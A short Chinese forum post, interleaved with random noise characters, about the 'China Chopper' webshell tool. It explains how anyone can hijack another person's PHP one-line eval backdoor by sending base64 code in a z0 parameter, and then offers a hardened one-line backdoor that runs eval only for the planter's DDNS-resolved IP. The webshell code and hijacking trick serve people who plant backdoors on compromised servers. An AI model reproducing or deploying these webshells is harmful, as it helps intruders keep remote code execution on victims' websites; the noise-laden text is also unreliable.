今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
- u( ]6 _8 q0 _ _9 J* g* Y
- K; l, d e; A) I) d2 N就算你设置了密码,使用了eval($_REQUEST['moyo']);
6 u' E! R0 t9 I) y
- t/ K k# M2 P4 T但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门- y1 p9 v g8 @( R. u, |5 }
4 r' ^+ x+ D5 V" r$ |' c因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
& @ B, q7 g$ A$ a5 c5 D/ Z$ @. T$ l
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了, B7 {! {2 u' d: s- E5 K
- P4 c: a! P% D" s6 v! k0 b不知道是设计缺陷还是故意留的后门8 R! m) G4 f! r _/ ^# d
2 V4 N& `7 \/ C4 f* @; u如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用! Y1 r7 p U- i$ T! l1 L1 }
7 p5 ]# P! x, t. k6 G( q% \本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org2 C& [8 z; Q% d& G1 D1 A+ M0 a
% r. U3 ~2 r& A9 a, L. [+ ]# c+ j然后一句话后门这样写/ ]5 P" Z0 B& N$ e& P( ] s; V
5 @: ]/ ?& n* S0 m1 E. a
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
' B& M& h+ r$ w& c* N) F这样就可以让一句话后门只允许自己的电脑连接了4 h6 o, q% ^0 A p6 e) d6 I( k
3 E; d4 H+ i2 ]$ k |